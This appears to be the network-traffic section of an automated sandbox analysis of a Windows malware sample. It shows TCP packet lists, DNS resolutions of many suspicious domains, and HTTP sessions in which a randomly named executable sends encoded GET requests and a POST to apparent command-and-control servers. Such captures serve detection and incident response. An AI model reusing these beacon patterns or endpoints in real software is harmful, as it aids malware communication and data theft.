                                                                                                                              Nov 2, 2024 08:12:09.071921110 CET6552280192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:09.893146992 CET6552280192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:10.911550045 CET4915580192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:10.916398048 CET8049155172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:10.916465044 CET4915580192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:10.923604965 CET4915580192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:10.928561926 CET8049155172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:11.647187948 CET8049155172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:11.647202015 CET8049155172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:11.647489071 CET4915580192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:11.649509907 CET8049155172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:11.649555922 CET4915580192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:11.651519060 CET4915580192.168.2.4172.67.131.32
                                                                                                                              Nov 2, 2024 08:12:11.656291008 CET8049155172.67.131.32192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:17.473648071 CET4919180192.168.2.4103.191.208.137
                                                                                                                              Nov 2, 2024 08:12:17.478507042 CET8049191103.191.208.137192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:17.478593111 CET4919180192.168.2.4103.191.208.137
                                                                                                                              Nov 2, 2024 08:12:17.490432024 CET4919180192.168.2.4103.191.208.137
                                                                                                                              Nov 2, 2024 08:12:17.495345116 CET8049191103.191.208.137192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:19.003439903 CET4919180192.168.2.4103.191.208.137
                                                                                                                              Nov 2, 2024 08:12:19.009012938 CET8049191103.191.208.137192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:19.011269093 CET4919180192.168.2.4103.191.208.137
                                                                                                                              Nov 2, 2024 08:12:20.027942896 CET4920780192.168.2.4103.191.208.137
                                                                                                                              Nov 2, 2024 08:12:20.032938957 CET8049207103.191.208.137192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:20.033221960 CET4920780192.168.2.4103.191.208.137
                                                                                                                              Nov 2, 2024 08:12:20.044430017 CET4920780192.168.2.4103.191.208.137
                                                                                                                              Nov 2, 2024 08:12:20.049231052 CET8049207103.191.208.137192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:21.549455881 CET4920780192.168.2.4103.191.208.137
                                                                                                                              Nov 2, 2024 08:12:21.554833889 CET8049207103.191.208.137192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:21.555324078 CET4920780192.168.2.4103.191.208.137
                                                                                                                              Nov 2, 2024 08:12:22.568470955 CET4922180192.168.2.4103.191.208.137
                                                                                                                              Nov 2, 2024 08:12:22.573354959 CET8049221103.191.208.137192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:22.577200890 CET4922180192.168.2.4103.191.208.137
                                                                                                                              Nov 2, 2024 08:12:22.588608027 CET4922180192.168.2.4103.191.208.137
                                                                                                                              Nov 2, 2024 08:12:22.593384027 CET8049221103.191.208.137192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:22.593548059 CET8049221103.191.208.137192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:22.593570948 CET8049221103.191.208.137192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:22.593583107 CET8049221103.191.208.137192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:22.593595982 CET8049221103.191.208.137192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:22.593630075 CET8049221103.191.208.137192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:22.593642950 CET8049221103.191.208.137192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:22.593655109 CET8049221103.191.208.137192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:22.593667030 CET8049221103.191.208.137192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:24.096412897 CET4922180192.168.2.4103.191.208.137
                                                                                                                              Nov 2, 2024 08:12:24.101675034 CET8049221103.191.208.137192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:24.101732016 CET4922180192.168.2.4103.191.208.137
                                                                                                                              Nov 2, 2024 08:12:25.116302967 CET4923680192.168.2.4103.191.208.137
                                                                                                                              Nov 2, 2024 08:12:25.121128082 CET8049236103.191.208.137192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:25.121206045 CET4923680192.168.2.4103.191.208.137
                                                                                                                              Nov 2, 2024 08:12:25.127933025 CET4923680192.168.2.4103.191.208.137
                                                                                                                              Nov 2, 2024 08:12:25.132723093 CET8049236103.191.208.137192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:27.336199045 CET8049236103.191.208.137192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:27.377474070 CET4923680192.168.2.4103.191.208.137
                                                                                                                              Nov 2, 2024 08:12:27.591434956 CET8049236103.191.208.137192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:27.593231916 CET4923680192.168.2.4103.191.208.137
                                                                                                                              Nov 2, 2024 08:12:27.618201971 CET4923680192.168.2.4103.191.208.137
                                                                                                                              Nov 2, 2024 08:12:27.623194933 CET8049236103.191.208.137192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:40.998202085 CET4932080192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:12:41.003458023 CET80493203.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:41.003823042 CET4932080192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:12:41.014682055 CET4932080192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:12:41.019558907 CET80493203.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:41.641248941 CET80493203.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:41.641465902 CET4932080192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:12:42.518342018 CET4932080192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:12:42.523504019 CET80493203.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:43.542785883 CET4933380192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:12:43.547688961 CET80493333.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:43.549278975 CET4933380192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:12:43.561191082 CET4933380192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:12:43.566030025 CET80493333.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:45.069257021 CET4933380192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:12:45.149288893 CET80493333.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:45.149398088 CET4933380192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:12:45.149744987 CET80493333.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:45.149833918 CET4933380192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:12:45.149888992 CET80493333.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:45.149946928 CET4933380192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:12:45.150113106 CET80493333.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:45.150228024 CET4933380192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:12:45.152626038 CET80493333.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:46.084686995 CET4934380192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:12:46.089549065 CET80493433.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:46.089616060 CET4934380192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:12:46.103533030 CET4934380192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:12:46.108395100 CET80493433.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:46.108406067 CET80493433.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:46.108437061 CET80493433.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:46.108445883 CET80493433.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:46.108484030 CET80493433.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:46.108493090 CET80493433.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:46.108566999 CET80493433.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:46.108576059 CET80493433.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:46.108583927 CET80493433.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:47.612436056 CET4934380192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:12:47.617769003 CET80493433.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:47.621385098 CET4934380192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:12:48.630537033 CET4935280192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:12:48.635447979 CET80493523.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:48.635541916 CET4935280192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:12:48.642544985 CET4935280192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:12:48.647474051 CET80493523.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:50.203681946 CET80493523.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:50.204364061 CET80493523.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:50.205319881 CET4935280192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:12:50.270148993 CET4935280192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:12:50.274983883 CET80493523.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:55.375211000 CET4935380192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:12:55.380064964 CET80493533.33.130.190192.168.2.4
                                                                                                                              Nov 2, 2024 08:12:55.380126953 CET4935380192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:12:55.391976118 CET4935380192.168.2.43.33.130.190
                                                                                                                              Nov 2, 2024 08:13:44.818382978 CET8049368162.0.211.143192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:44.821423054 CET4936880192.168.2.4162.0.211.143
                                                                                                                              Nov 2, 2024 08:13:44.864203930 CET4936880192.168.2.4162.0.211.143
                                                                                                                              Nov 2, 2024 08:13:44.869091988 CET8049368162.0.211.143192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:45.535084009 CET8049368162.0.211.143192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:45.573302031 CET8049368162.0.211.143192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:45.573385000 CET4936880192.168.2.4162.0.211.143
                                                                                                                              Nov 2, 2024 08:13:45.574232101 CET4936880192.168.2.4162.0.211.143
                                                                                                                              Nov 2, 2024 08:13:45.579200029 CET8049368162.0.211.143192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:50.656337023 CET4936980192.168.2.4195.110.124.133
                                                                                                                              Nov 2, 2024 08:13:50.661366940 CET8049369195.110.124.133192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:50.668343067 CET4936980192.168.2.4195.110.124.133
                                                                                                                              Nov 2, 2024 08:13:50.677325010 CET4936980192.168.2.4195.110.124.133
                                                                                                                              Nov 2, 2024 08:13:50.682127953 CET8049369195.110.124.133192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:51.542506933 CET8049369195.110.124.133192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:51.622380018 CET4936980192.168.2.4195.110.124.133
                                                                                                                              Nov 2, 2024 08:13:51.666866064 CET8049369195.110.124.133192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:51.666923046 CET4936980192.168.2.4195.110.124.133
                                                                                                                              Nov 2, 2024 08:13:52.191351891 CET4936980192.168.2.4195.110.124.133
                                                                                                                              Nov 2, 2024 08:13:53.209758997 CET4937080192.168.2.4195.110.124.133
                                                                                                                              Nov 2, 2024 08:13:53.214612961 CET8049370195.110.124.133192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:53.214679956 CET4937080192.168.2.4195.110.124.133
                                                                                                                              Nov 2, 2024 08:13:53.227554083 CET4937080192.168.2.4195.110.124.133
                                                                                                                              Nov 2, 2024 08:13:53.233053923 CET8049370195.110.124.133192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:54.087502003 CET8049370195.110.124.133192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:54.212105989 CET8049370195.110.124.133192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:54.215447903 CET4937080192.168.2.4195.110.124.133
                                                                                                                              Nov 2, 2024 08:13:54.737118959 CET4937080192.168.2.4195.110.124.133
                                                                                                                              Nov 2, 2024 08:13:55.766957045 CET4937180192.168.2.4195.110.124.133
                                                                                                                              Nov 2, 2024 08:13:55.771847010 CET8049371195.110.124.133192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:55.771914959 CET4937180192.168.2.4195.110.124.133
                                                                                                                              Nov 2, 2024 08:13:55.786317110 CET4937180192.168.2.4195.110.124.133
                                                                                                                              Nov 2, 2024 08:13:55.791193008 CET8049371195.110.124.133192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:55.791204929 CET8049371195.110.124.133192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:55.791215897 CET8049371195.110.124.133192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:55.791256905 CET8049371195.110.124.133192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:55.791270018 CET8049371195.110.124.133192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:55.791279078 CET8049371195.110.124.133192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:55.791351080 CET8049371195.110.124.133192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:55.791362047 CET8049371195.110.124.133192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:55.791369915 CET8049371195.110.124.133192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:56.643089056 CET8049371195.110.124.133192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:56.693329096 CET4937180192.168.2.4195.110.124.133
                                                                                                                              Nov 2, 2024 08:13:56.769157887 CET8049371195.110.124.133192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:56.769424915 CET4937180192.168.2.4195.110.124.133
                                                                                                                              Nov 2, 2024 08:13:57.299622059 CET4937180192.168.2.4195.110.124.133
                                                                                                                              Nov 2, 2024 08:13:58.318231106 CET4937280192.168.2.4195.110.124.133
                                                                                                                              Nov 2, 2024 08:13:58.323803902 CET8049372195.110.124.133192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:58.325445890 CET4937280192.168.2.4195.110.124.133
                                                                                                                              Nov 2, 2024 08:13:58.333332062 CET4937280192.168.2.4195.110.124.133
                                                                                                                              Nov 2, 2024 08:13:58.338486910 CET8049372195.110.124.133192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:59.174343109 CET8049372195.110.124.133192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:59.268290043 CET4937280192.168.2.4195.110.124.133
                                                                                                                              Nov 2, 2024 08:13:59.298933983 CET8049372195.110.124.133192.168.2.4
                                                                                                                              Nov 2, 2024 08:13:59.299026012 CET4937280192.168.2.4195.110.124.133
                                                                                                                              Nov 2, 2024 08:13:59.299966097 CET4937280192.168.2.4195.110.124.133
                                                                                                                              Nov 2, 2024 08:13:59.305874109 CET8049372195.110.124.133192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:04.399486065 CET4937380192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:04.404411077 CET8049373185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:04.404587984 CET4937380192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:04.413924932 CET4937380192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:04.420345068 CET8049373185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:05.317828894 CET8049373185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:05.362082005 CET4937380192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:05.474242926 CET8049373185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:05.474302053 CET4937380192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:05.930537939 CET4937380192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:06.944365025 CET4937480192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:06.949562073 CET8049374185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:06.949645042 CET4937480192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:06.965349913 CET4937480192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:06.970376015 CET8049374185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:07.875579119 CET8049374185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:08.037628889 CET8049374185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:08.037679911 CET4937480192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:08.474715948 CET4937480192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:09.490874052 CET4937580192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:09.495735884 CET8049375185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:09.495937109 CET4937580192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:09.509880066 CET4937580192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:09.514760017 CET8049375185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:09.514774084 CET8049375185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:09.514797926 CET8049375185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:09.514807940 CET8049375185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:09.514857054 CET8049375185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:09.514875889 CET8049375185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:09.514908075 CET8049375185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:09.514918089 CET8049375185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:09.514926910 CET8049375185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:10.455612898 CET8049375185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:10.552131891 CET4937580192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:10.630234003 CET8049375185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:10.632832050 CET4937580192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:11.018472910 CET4937580192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:12.051240921 CET4937680192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:12.056046009 CET8049376185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:12.056124926 CET4937680192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:12.065160990 CET4937680192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:12.070156097 CET8049376185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:12.999943972 CET8049376185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:12.999978065 CET8049376185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:12.999990940 CET8049376185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:13.000019073 CET8049376185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:13.000034094 CET8049376185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:13.000050068 CET8049376185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:13.000062943 CET8049376185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:13.000112057 CET4937680192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:13.000154972 CET4937680192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:13.166991949 CET8049376185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:13.167292118 CET4937680192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:13.168096066 CET4937680192.168.2.4185.68.16.94
                                                                                                                              Nov 2, 2024 08:14:13.172904968 CET8049376185.68.16.94192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:18.743320942 CET4937780192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:18.748214006 CET8049377163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:18.748307943 CET4937780192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:18.761945009 CET4937780192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:18.766710997 CET8049377163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:19.625241041 CET8049377163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:19.625253916 CET8049377163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:19.625514984 CET4937780192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:19.762628078 CET8049377163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:19.763724089 CET4937780192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:20.268395901 CET4937780192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:21.287043095 CET4937880192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:21.291891098 CET8049378163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:21.292387009 CET4937880192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:21.305398941 CET4937880192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:21.310300112 CET8049378163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:22.198544025 CET8049378163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:22.198559046 CET8049378163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:22.198623896 CET4937880192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:22.342174053 CET8049378163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:22.342235088 CET4937880192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:22.816807985 CET4937880192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:23.837383032 CET4937980192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:23.842360020 CET8049379163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:23.842498064 CET4937980192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:23.857414961 CET4937980192.168.2.4163.44.176.12
                                                                                                                              Nov 2, 2024 08:14:23.862392902 CET8049379163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:23.862407923 CET8049379163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:23.862477064 CET8049379163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:23.862487078 CET8049379163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:23.862497091 CET8049379163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:23.862550974 CET8049379163.44.176.12192.168.2.4
                                                                                                                              Nov 2, 2024 08:14:23.862626076 CET8049379163.44.176.12192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                              Nov 2, 2024 08:12:55.372700930 CET1.1.1.1192.168.2.40x12a3No error (0)www.bocadolobopetra.netbocadolobopetra.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:12:55.372700930 CET1.1.1.1192.168.2.40x12a3No error (0)bocadolobopetra.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:12:55.372700930 CET1.1.1.1192.168.2.40x12a3No error (0)bocadolobopetra.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:13:08.887018919 CET1.1.1.1192.168.2.40x119aNo error (0)www.44kdd.top44kdd.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:13:08.887018919 CET1.1.1.1192.168.2.40x119aNo error (0)44kdd.top38.47.232.160A (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:13:23.283026934 CET1.1.1.1192.168.2.40x8e91No error (0)www.dbasky.net34.92.109.131A (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:13:37.127196074 CET1.1.1.1192.168.2.40xff36No error (0)www.zoptra.info162.0.211.143A (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:13:50.649485111 CET1.1.1.1192.168.2.40x2a7fNo error (0)www.nutrigenfit.onlinenutrigenfit.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:13:50.649485111 CET1.1.1.1192.168.2.40x2a7fNo error (0)nutrigenfit.online195.110.124.133A (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:14:04.394450903 CET1.1.1.1192.168.2.40x4d48No error (0)www.redex.fun185.68.16.94A (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:14:18.740415096 CET1.1.1.1192.168.2.40x19ecNo error (0)www.broork.sbs163.44.176.12A (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:14:33.388525963 CET1.1.1.1192.168.2.40x54afNo error (0)www.deepfy.xyz199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:14:47.368329048 CET1.1.1.1192.168.2.40x91b2No error (0)www.cmdh1c.xyzofficial.roamimg.strawberrycdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:14:47.368329048 CET1.1.1.1192.168.2.40x91b2No error (0)official.roamimg.strawberrycdn.com103.233.82.58A (IP address)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:15:03.336184978 CET1.1.1.1192.168.2.40xd522No error (0)www.beautyconcernsusa.netbeautyconcernsusa.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Nov 2, 2024 08:15:03.336184978 CET1.1.1.1192.168.2.40xd522No error (0)beautyconcernsusa.net216.219.93.17A (IP address)IN (0x0001)false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 65458 | 3.33.130.190 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 08:11:47.532429934 CET | 523 | OUT | GET /a1y9/?SJuP9=UPQLWRgHAD_&Z0WTZ=iZz4I3W5iLJGfbtGmZ2CObwfByBiroJddzdGuVUGr5fdVP/mU/ghPDmzUyOVJzAbJgU0ueO9BFeqSkyyfz76yiSG65EDj9rJsjZ/uDCtsUVT8Sp7eRbdwLE= HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.litsgs.vip
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Nov 2, 2024 08:11:48.186441898 CET | 399 | IN | HTTP/1.1 200 OK
                                                                                                                              Server: openresty
                                                                                                                              Date: Sat, 02 Nov 2024 07:11:48 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 259
                                                                                                                              Connection: close
                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?SJuP9=UPQLWRgHAD_&Z0WTZ=iZz4I3W5iLJGfbtGmZ2CObwfByBiroJddzdGuVUGr5fdVP/mU/ghPDmzUyOVJzAbJgU0ueO9BFeqSkyyfz76yiSG65EDj9rJsjZ/uDCtsUVT8Sp7eRbdwLE="}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 65495 | 172.67.131.32 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 2, 2024 08:12:03.285598040 CET | 810 | OUT | POST /c2q3/ HTTP/1.1
